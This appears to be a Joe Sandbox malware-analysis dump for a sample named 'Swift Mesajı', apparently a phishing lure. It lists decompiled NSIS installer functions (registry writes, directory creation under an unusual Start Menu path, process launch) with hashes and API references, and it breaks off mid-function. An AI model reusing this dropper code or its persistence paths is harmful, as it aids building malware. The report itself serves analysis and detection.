Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: d3cd4e237e97a83a370d1370055c4bdc9f0797550a95890627c0fc6a79ec6b1b
Instruction ID: 74a91dccfe9731269d403f92625f9bdea7e35384dcad0b9637cdbdb8d435ba20
Opcode Fuzzy Hash: d3cd4e237e97a83a370d1370055c4bdc9f0797550a95890627c0fc6a79ec6b1b
Instruction Fuzzy Hash: 4D21C171948209AEEF05AFA5CE4AABE7BB4EF84308F14443EF502B61D0D7B84541DB18

Uniqueness

Uniqueness Score: -1.00%

Function 004023DE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E004023DE(void* __eax, int __ebx, intOrPtr __edx) {
				void* _t20;
				void* _t21;
				int _t24;
				long _t25;
				int _t30;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t37;
				void* _t39;
				void* _t42;

				_t33 = __edx;
				_t30 = __ebx;
				_t37 =  *((intOrPtr*)(_t39 - 0x18));
				_t34 = __eax;
				 *(_t39 - 0x4c) =  *(_t39 - 0x14);
				 *(_t39 - 0x3c) = E00402C37(2);
				_t20 = E00402C37(0x11);
				 *(_t39 - 4) = 1;
				_t21 = E00402CC7(_t42, _t34, _t20, 2); // executed
				 *(_t39 + 8) = _t21;
				if(_t21 != __ebx) {
					_t24 = 0;
					if(_t37 == 1) {
						E00402C37(0x23);
						_t24 = lstrlenW(0x40b5d0) + _t29 + 2;
					}
					if(_t37 == 4) {
						 *0x40b5d0 = E00402C15(3);
						 *((intOrPtr*)(_t39 - 0x30)) = _t33;
						_t24 = _t37;
					}
					if(_t37 == 3) {
						_t24 = E004030FA( *((intOrPtr*)(_t39 - 0x1c)), _t30, 0x40b5d0, 0x1800); // executed
					}
					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x3c), _t30,  *(_t39 - 0x4c), 0x40b5d0, _t24); // executed
					if(_t25 == 0) {
						 *(_t39 - 4) = _t30;
					}
					_push( *(_t39 + 8));
					RegCloseKey();
				}
				 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
				return 0;
			}

0x004023de
0x004023de
0x004023de
0x004023e1
0x004023e8
0x004023f2
0x004023f5
0x004023fe
0x00402405
0x0040240c
0x0040240f
0x00402415
0x0040241f
0x00402423
0x0040242e
0x0040242e
0x00402435
0x0040243f
0x00402445
0x00402448
0x00402448
0x0040244c
0x00402458
0x00402458
0x00402469
0x00402471
0x00402473
0x00402473
0x00402476
0x00402551
0x00402551
0x00402ac2
0x00402ace

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsjFA0C.tmp,00000023,00000011,00000002), ref: 00402429
RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsjFA0C.tmp,00000000,00000011,00000002), ref: 00402469
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsjFA0C.tmp,00000000,00000011,00000002), ref: 00402551

Strings

C:\Users\user\AppData\Local\Temp\nsjFA0C.tmp, xrefs: 0040241A, 0040243F, 00402453, 0040245E

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsjFA0C.tmp
API String ID: 2655323295-2771038070
Opcode ID: d314daa77b1a5bddc68282b153224c2aabf702024f7a5803a7dd81a3f3e5214a
Instruction ID: 6bb9d856f7880fc58a9027dca602f60b1bf716c37025aa19f03bdcb786be9778
Opcode Fuzzy Hash: d314daa77b1a5bddc68282b153224c2aabf702024f7a5803a7dd81a3f3e5214a
Instruction Fuzzy Hash: 33118171E00108AEEB10AFA5DE49EAEBAB8EB54354F11843AF504F71D1DBB84D419B58

Uniqueness

Uniqueness Score: -1.00%

Function 00402D2A Relevance: 6.1, APIs: 4, Instructions: 64
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402D2A(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				short _v532;
				void* _t19;
				signed int _t26;
				intOrPtr* _t28;
				signed int _t33;
				signed int _t34;
				signed int _t35;

				_t34 = _a12;
				_t35 = _t34 & 0x00000300;
				_t33 = _t34 & 0x00000001;
				_t19 = E004060EF(__eflags, _a4, _a8, _t35 | 0x00000008,  &_v8); // executed
				if(_t19 == 0) {
					while(RegEnumKeyW(_v8, 0,  &_v532, 0x105) == 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							RegCloseKey(_v8);
							return 1;
						}
						_t26 = E00402D2A(__eflags, _v8,  &_v532, _a12);
						__eflags = _t26;
						if(_t26 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t28 = E0040665C(3);
					if(_t28 == 0) {
						return RegDeleteKeyW(_a4, _a8);
					}
					return  *_t28(_a4, _a8, _t35, 0);
				}
				return _t19;
			}

0x00402d35
0x00402d3e
0x00402d47
0x00402d53
0x00402d5a
0x00402d7e
0x00402d64
0x00402d66
0x00402db9
0x00000000
0x00402dc1
0x00402d75
0x00402d7a
0x00402d7c
0x00000000
0x00000000
0x00402d7c
0x00402d98
0x00402da0
0x00402da7
0x00000000
0x00402dca
0x00000000
0x00402db2
0x00402dd4

APIs

RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
RegCloseKey.ADVAPI32(?), ref: 00402D98
RegCloseKey.ADVAPI32(?), ref: 00402DB9

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
Instruction ID: 79d7ed05643b621c8e133add132d673d265f3a1e436d48668917152172a1be90
Opcode Fuzzy Hash: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
Instruction Fuzzy Hash: AD116A32540509FBDF129F90CE09BEE7B69EF58340F110036B905B50E0E7B5DE21AB68

Uniqueness

Uniqueness Score: -1.00%

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402C37(0xfffffff0);
				_t17 = E00405BFE(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405B80(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405832( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x20)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x20)) == _t28 || E0040584F(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E004057B5( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x24)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406282(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Ydervgg\\Superassume\\dodecaheddra\\Novelizes",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}

0x004015c1
0x004015c9
0x004015cc
0x004015d1
0x004015d5
0x004015d7
0x004015df
0x004015e1
0x004015e4
0x004015ea
0x00401604
0x00401607
0x004015ec
0x004015ec
0x004015ef
0x00000000
0x004015fa
0x004015fd
0x004015fd
0x004015ef
0x0040160e
0x00401615
0x00401624
0x00401624
0x00401617
0x0040161a
0x00401622
0x00000000
0x00000000
0x00401622
0x00401615
0x00401627
0x0040162b
0x0040162c
0x004015d7
0x00401634
0x00401663
0x00402245
0x00401636
0x00401638
0x00401645
0x0040164d
0x00401655
0x0040165b
0x0040165b
0x00401655
0x00402ac2
0x00402ace

APIs

Part of subcall function 00405BFE: CharNextW.USER32(?,?,C:\,?,00405C72,C:\,C:\,?,?,76203420,004059B0,?,C:\Users\user\AppData\Local\Temp\,76203420,00000000), ref: 00405C0C
Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C11
Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C29

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 004057B5: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057F8

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Novelizes,?,00000000,000000F0), ref: 0040164D

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Novelizes, xrefs: 00401640

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Novelizes
API String ID: 1892508949-3281549536
Opcode ID: 73225eed0d1f65cb901f8f6d18868916e3c95e296cac37f30907a214286dc7a5
Instruction ID: f4fc84295b44ed4b17ac4e1ae603b231d2bd930c419d474b78473434f223dd35
Opcode Fuzzy Hash: 73225eed0d1f65cb901f8f6d18868916e3c95e296cac37f30907a214286dc7a5
Instruction Fuzzy Hash: 7711BE31504104ABCF316FA4CD01AAF36A0EF14368B28493BEA45B22F1DB3E4E519A4E

Uniqueness

Uniqueness Score: -1.00%

Function 00405C5B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00405C5B(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E00406282(0x42fa50, _a4);
				_t21 = E00405BFE(0x42fa50);
				if(_t21 != 0) {
					E00406516(_t21);
					if(( *0x434efc & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x42fa50 >> 1;
						while(1) {
							_t11 = lstrlenW(0x42fa50);
							_push(0x42fa50);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E004065C5();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405B9F(0x42fa50);
								continue;
							} else {
								goto L1;
							}
						}
						E00405B53();
						_t16 = GetFileAttributesW(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x00405c67
0x00405c72
0x00405c76
0x00405c7d
0x00405c89
0x00405c99
0x00405c9b
0x00405cb3
0x00405cb4
0x00405cbb
0x00405cbc
0x00000000
0x00000000
0x00405c9f
0x00405ca6
0x00405cae
0x00000000
0x00000000
0x00000000
0x00000000
0x00405ca6
0x00405cbe
0x00405cc4
0x00000000
0x00405cd2
0x00405c8b
0x00405c91
0x00000000
0x00000000
0x00000000
0x00000000
0x00405c91
0x00405c78
0x00000000

APIs

Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F

Part of subcall function 00405BFE: CharNextW.USER32(?,?,C:\,?,00405C72,C:\,C:\,?,?,76203420,004059B0,?,C:\Users\user\AppData\Local\Temp\,76203420,00000000), ref: 00405C0C
Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C11
Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C29

lstrlenW.KERNEL32(C:\,00000000,C:\,C:\,?,?,76203420,004059B0,?,C:\Users\user\AppData\Local\Temp\,76203420,00000000), ref: 00405CB4
GetFileAttributesW.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,76203420,004059B0,?,C:\Users\user\AppData\Local\Temp\,76203420), ref: 00405CC4

Strings

C:\, xrefs: 00405C61, 00405C66, 00405C6C, 00405CAD, 00405CB3, 00405CBB, 00405CC3

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\
API String ID: 3248276644-3404278061
Opcode ID: a970eb1a3142989cf927e9e4643bcace7998e9650737c8fd412cf721476e62ae
Instruction ID: 85ea7651a51856ee7c4c0712bbf35357d52fdd33bb29f336d43f3a771a20a055
Opcode Fuzzy Hash: a970eb1a3142989cf927e9e4643bcace7998e9650737c8fd412cf721476e62ae
Instruction Fuzzy Hash: 0DF0F925109F5215F622323A1D09EAF2554CF83368716463FF952B16D5DA3C99038D7D

Uniqueness

Uniqueness Score: -1.00%

Function 0040525A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040525A(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t9;
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x42d234 != _t16) {
							_push(_t16);
							_push(6);
							 *0x42d234 = _t16;
							E00404C30();
						}
						L11:
						_t9 = CallWindowProcW( *0x42d23c, _a4, _t15, _a12, _t16); // executed
						return _t9;
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404BB0(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404263(0x413);
				return 0;
			}

0x0040525e
0x00405268
0x00405284
0x004052a6
0x004052a9
0x004052af
0x004052b9
0x004052ba
0x004052bc
0x004052c2
0x004052c2
0x004052cc
0x004052da
0x00000000
0x004052da
0x00405291
0x004052c9
0x004052c9
0x00000000
0x004052c9
0x0040529d
0x0040529f
0x00000000
0x0040529f
0x0040526e
0x00000000
0x00000000
0x00405275
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 00405289
CallWindowProcW.USER32(?,?,?,?), ref: 004052DA

Part of subcall function 00404263: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404275

Strings

, xrefs: 0040526A

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 3fd7a5bdf8e2bcd8409f4f3104da706e70a9a66b0760f7062862c6eded0751b7
Instruction ID: e35359e86d41fb5d6968ee62a371e6abd11f03428b82ac61abb391d392e116c6
Opcode Fuzzy Hash: 3fd7a5bdf8e2bcd8409f4f3104da706e70a9a66b0760f7062862c6eded0751b7
Instruction Fuzzy Hash: 0E017131510609ABDF209F51DD84A5B3A25EF84754F5000BBFA04751D1C77A9C929E6E

Uniqueness

Uniqueness Score: -1.00%

Function 00406150 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00406150(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E004060EF(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8); // executed
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x0040615e
0x00406160
0x00406178
0x0040617d
0x00406182
0x004061c0
0x004061c0
0x00406184
0x00406196
0x004061a1
0x004061a7
0x004061b2
0x00000000
0x00000000
0x004061b2
0x004061c6

APIs

RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,0042C228,00000000,?,?,Call,?,?,004063C4,80000002), ref: 00406196
RegCloseKey.ADVAPI32(?,?,004063C4,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,0042C228), ref: 004061A1

Strings

Call, xrefs: 00406157

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction ID: ccae29ee16f81b62eed190a0e72f85d1395cd89474178e8bc9e2f9375c5b4726
Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction Fuzzy Hash: C7017172510209EADF21CF55CD05EDF3BA8EB54360F018035FD1596191D779D968CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405867 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405867(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x430250->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x430250,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x00405870
0x00405890
0x00405898
0x0040589d
0x00000000
0x004058a3
0x004058a7

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405890
CloseHandle.KERNEL32(?), ref: 0040589D

Strings

Error launching installer, xrefs: 0040587A

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
Instruction ID: d54ab7d3c02f92ec190dfac26e1bcd6e14271da7ed0e34d6283108f8b7c5a0e7
Opcode Fuzzy Hash: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
Instruction Fuzzy Hash: D4E09AB5900209BFEB109F65DD49F7B77ACEB04744F004565BD50F2150D778D8148A78

Uniqueness

Uniqueness Score: -1.00%

Function 0040202C Relevance: 4.6, APIs: 3, Instructions: 73
libraryCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E0040202C(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				void* _t34;
				WCHAR* _t37;
				intOrPtr* _t38;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x434fb8");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
					return 0;
				}
				_t37 = E00402C37(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x3c)) = E00402C37(1);
				if( *((intOrPtr*)(_t39 - 0x18)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t37, _t32, 8); // executed
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
